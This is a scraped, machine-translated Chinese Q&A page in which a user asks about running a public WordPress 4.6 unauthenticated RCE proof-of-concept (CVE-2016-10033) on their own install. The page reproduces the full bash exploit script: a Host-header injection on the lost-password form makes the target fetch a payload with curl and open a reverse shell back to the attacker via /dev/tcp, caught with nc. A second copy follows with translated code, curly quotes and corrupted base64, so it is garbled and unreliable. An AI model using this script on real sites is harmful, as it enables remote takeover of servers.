Php WordPress 4.6-未经验证的远程代码执行
我对该漏洞进行了现场演示: 我在我的域上安装了wp4.6,而不是安装了kali-linux,但是当我执行bash代码时,我得到了这个输出 我检查了机器人的状态,允许所有机器人访问网站 在这里可以找到bash脚本的详细信息 我应该更改rev_host=“…”,我尝试了网站的IP,但没有更改输出Php WordPress 4.6-未经验证的远程代码执行,php,wordpress,bash,security,exploit,Php,Wordpress,Bash,Security,Exploit,我对该漏洞进行了现场演示: 我在我的域上安装了wp4.6,而不是安装了kali-linux,但是当我执行bash代码时,我得到了这个输出 我检查了机器人的状态,允许所有机器人访问网站 在这里可以找到bash脚本的详细信息 我应该更改rev_host=“…”,我尝试了网站的IP,但没有更改输出 #!/bin/bash # # __ __ __ __ __ # / / ___ ____ _____ _/
#!/bin/bash
#
# __ __ __ __ __
# / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
# / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
# / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
# /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
# /____/
#
#
# WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
# CVE-2016-10033
#
# wordpress-rce-exploit.sh (ver. 1.0)
#
#
# Discovered and coded by
#
# Dawid Golunski (@dawid_golunski)
# https://legalhackers.com
#
# ExploitBox project:
# https://ExploitBox.io
#
# Full advisory URL:
# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
#
# Exploit src URL:
# https://exploitbox.io/exploit/wordpress-rce-exploit.sh
#
#
# Tested on WordPress 4.6:
# https://github.com/WordPress/WordPress/archive/4.6.zip
#
# Usage:
# ./wordpress-rce-exploit.sh target-wordpress-url
#
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulns/exploitation?
#
#
# .;lc'
# .,cdkkOOOko;.
# .,lxxkkkkOOOO000Ol'
# .':oxxxxxkkkkOOOO0000KK0x:'
# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
# '';ldxxxxxdc,. ,oOXXXNNNXd;,.
# .ddc;,,:c;. ,c: .cxxc:;:ox:
# .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
# .dxxxxxdl;. ., .. .;cdxxxxxx:
# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
# .':oxxxxxxxxx.ckkkkkkkkxl,.
# .,cdxxxxx.ckkkkkxc.
# .':odx.ckxl,.
# .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------
rev_host="192.168.57.1"
function prep_host_header() {
cmd="$1"
rce_cmd="\${run{$cmd}}";
# replace / with ${substr{0}{1}{$spool_directory}}
#sed 's^/^${substr{0}{1}{$spool_directory}}^g'
rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"
# replace ' ' (space) with
#sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
#return "target(any -froot@localhost -be $rce_cmd null)"
host_header="target(any -froot@localhost -be $rce_cmd null)"
return 0
}
#cat exploitbox.ans
intro="
DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
intro2="
ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
echo "$intro" | base64 -d
echo "$intro2" | base64 -d
if [ "$#" -ne 1 ]; then
echo -e "Usage:\n$0 target-wordpress-url\n"
exit 1
fi
target="$1"
echo -ne "\e[91m[*]\033[0m"
read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
echo
if [ "$choice" == "y" ]; then
echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
echo -e "\e[92m[+]\033[0m Connected to the target"
# Serve payload/bash script on :80
RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!
# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/bin/bash /tmp/rce"
prep_host_header "$cmd"
curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &
echo -e "\n\e[92m[+]\033[0m Payload executed!"
echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
nc -vv -l 1337
echo
else
echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
exit 0
fi
echo "Exiting..."
exit 0
#/bin/bash
#
# __ __ __ __ __
# / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
# / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
# / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
# /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
# /____/
#
#
#WordPress 4.6-远程代码执行(RCE)PoC攻击
#CVE-2016-10033
#
#wordpress-rce-exploit.sh(1.0版)
#
#
#由发现和编码
#
#Dawid Golunski(@Dawid_Golunski)
# https://legalhackers.com
#
#开发箱项目:
# https://ExploitBox.io
#
#完整的咨询网址:
# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
#
#利用src URL:
# https://exploitbox.io/exploit/wordpress-rce-exploit.sh
#
#
#在WordPress 4.6上测试:
# https://github.com/WordPress/WordPress/archive/4.6.zip
#
#用法:
#./wordpress-rce-exploit.sh目标wordpress url
#
#
#免责声明:
#仅用于测试目的
#
#
# -----------------------------------------------------------------
#
#对vulns/剥削感兴趣?
#
#
# .;立法会'
#,cdkkOOOko;。
#,lxxkkooo000ol'
#.:Oxxxxkkkooo0000kk0x:'
# .;LDXXXXXXXXXKXL,.'lk0000KKKXXXKd;。
#':oxxxxxxxxxo;:Ookkxxxnnol。
# '';ldxxxxxdc,oOXXXNNNXd;,。
#.ddc;,:Cc:.cxxc:;:牛:
#.dxxxo,,,kMMM0:。lxxx:
#.DXXXC lW。OMMMMK d0.xxxxxx:
#.DXXXC.0k.,KWMMMMWNO:X:.xxxxxx:
#.dxxxxc.xN0xxxxxxxkXK.xxxxxx:
#.dxxxxxc LDDOMMMWD0MMMKDDD。xxxxxx:
#.dxxxxxc.cNMMMN.OMMMX'.xxxxxx:
#.DXXXC lKo;dNMN.oMM0;:好的xxxxxx:
#.DXXXC;Mc.lx.:o,Kl'xxxxxx:
#.DXXXDL。;cdxxxxxx:
#.dxxxxxxxxxdc,'cdkkxxxxxxxx:
#.:oxxxxxxxxdl。;LXKKXXDC,。
# .;LDXXXXXXXXDC、.CXKKXD:。
#.:oxxxxxxxxx.ckkkxl,。
#,cdxxxxx.ckkkxc。
#:odx.ckxl,。
# .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------
rev_host=“192.168.57.1”
函数准备\u主机\u头(){
cmd=“$1”
rce_cmd=“\${run{$cmd}}”;
#将/替换为${substr{0}{1}{$spool_directory}}
#sed的^/^${substr{0}{1}{$spool_directory}}^g'
rce_cmd=“`echo$rce_cmd | sed's^/^\${substr{0}{1}{\$spool_directory}}^g`”
#将“”(空格)替换为
#sed的^^${substr{10}{1}{$tod_log}}$^g'
rce_cmd=“`echo$rce_cmd | sed's^^\${substr{10}{1}{\$tod_log}}^g`”
#return“目标(任何-froot@localhost-be$rce\u cmd null)
host_header=“目标(任何-froot@localhost-be$rce\u cmd null)
返回0
}
#猫咪
简介=”
DQOBWZBTMBMJFDG1SXOZM0BSAGICAUO2XJJW0KG1SWBSABWZIXQXTBMTSZNG0ULNGNKA2TPT09R
bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
G1S2Q19FX19FX18FxIgif9Fxy9FIF9Fx18GG1SxOzM0BSCBWZBTX19FxBTBNKMVx19Fx19C
G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
IHWGIFxFx19FXY8VG1S3Q1WNCIAGL19FX19FXZ4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
IC8BWZVDxCBFX19FX19FLW0KIBTMTFDPF9FXY9CX19FPIAGICAVX19FX19FX18VICAGIC9FX19F
X19FPG0KIBTBNKMBWZE7MZRTLMRKYZSSLDPJOY4BWZLDG1SWBSXJOHTBOUMBWZM0BS5JEHJOJS6
b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
NUMBWZM0BS5SEHH4EHG6DQOBWZM3BSABWZZDG1SxOZM0BS5KEH4EHHJG11QXTBMG1SVY4GB01N
TU1NTU1LICBKMBTBNUMBWZM0BS54EHH4EHG6DQOBWZM3BSABWZDG1XOZM0BS5KEHH4EHHJG1S1
QXTBMG0UMGSULETXTU1NV05VIDPYOHTBNUMBWZM0BS54EHH4EHG6DQOBWZM3BSABWZDDLHTBMTSZ
NG1KEHH4EHHJG1S2QXTBMG0UE4WEH4EHH4EGTYSYWBWZZDG1SZNG0UEH4EHH4OG0KG1SZN20G
G1S2QY4BWZE7MrTZHH4EHH4YYAgicabWZBTBGRKT01NTU1XZDBNTU1NS2RKZC4GICABWZM0BS54
EHH4EHG6DQOBWZM3BSABWZZDG1SOZM0BS5KEHH4EHHJG1S2QXTBMG0UY05NTU1OLM9NTU1NECCB
WZZDG1SZNG0UEH4EHH4OG0KG1SZN20GG1S2QXTBMTSZNG0UZH4EHH4YXTBNUMBWZBTETVO2RO
TU4UB01NMDS6T2UICAGIBTMZRTJ3H4EHH4EDONCHTBMZDTBTNKMBWZE7MZRTLMR4EHH4EGMG
ICAGG1SWBTNYAGIC5SEC46BYWGICAGS2WGICAGG1SNG0NEH4EHH4OG0KG1SZN20GG1S2QXTB
MTSZNG0UZHH4EH4ZGW7LIAULBBMTVDG1SWOZM0BS4UIC47Y2R4EHH4EHG6DQOBWZM3BSABWZZD
G1SXOZM0BS5KEHH4ECABWZBTX19FX19FX18BWZEWQ19FX18GIF9FX19FIBBMZRTEH4EHG6DQOB
WZM3BSABWZDDG1SxOzM0BS4NOM94IBTBMG1CG1S2QY9FIF9FX19FXCAGIFWVICAGIC8GG1SZ
NG14EGMSLG0KG1SZN20GG1SmumbwZe7MrZrtLibWZbtLxTbNumVicBcXbtbOEM+G1s3QzwgIBtb
MZRTECWNCHTMBZDTIBMTJDLXTBDDLYAGIHWGICAVICAGL1WGICAGXA0KIBTMTJDXF9FX19F
X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
BCWUDQOBWZM3BSABWZI1QXTBMTSZNG0ULC4BWZA7MZRTJY4NCHTMBMZDTI0K“
简介2=”
ICAGICAGICAGICAGIIBTBNDRTFCBFFEHBSB2L0QM94LMLVIHWBWZBTCGOBWZK0BSSGLS09
FBTBMG0GG1S5MW1XB3JKCHJLC3MGQ29YZSTATIFV0AGVUDGLJYXRLZCBSQ0UGRXHWBG9PDBTB
MG0GibtBortFBMG0KG1S05NG0Ric0TPxWBWZBTICAGICAGICAG
ICAGICAGICAGICAGICAGIBABWZK0BXWBWZBTCHTBOTRTKYATT18G1SWBSAGICAGICAGICAGICBE
AXNJB3ZLCMVKICYGQ29KZWQGQNKGICAGICAGG1G1S5NG18G1SWBQOBWZK0BSSGLS09
FBTBMG0GICAGICABWZK0BURHD2LKIEDVUC2TPG1SWBSAGGICABG
ICAGIBTOTBTBMG0GCHTBORTKYATT18G1SWBSAGICAGIBTOTTAHR0CHM6LY9SZWDH
BGHY2TLCNMUY29TG1SWBSAGGICAGG1S5 NG18G1SWBSAG1S5 NG0RIC0TPXWBWZBT
ICAGICAGICAGICAGICAGICAGICAGICAGICAGICAGICABWZK0BXWBWZBT
ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBD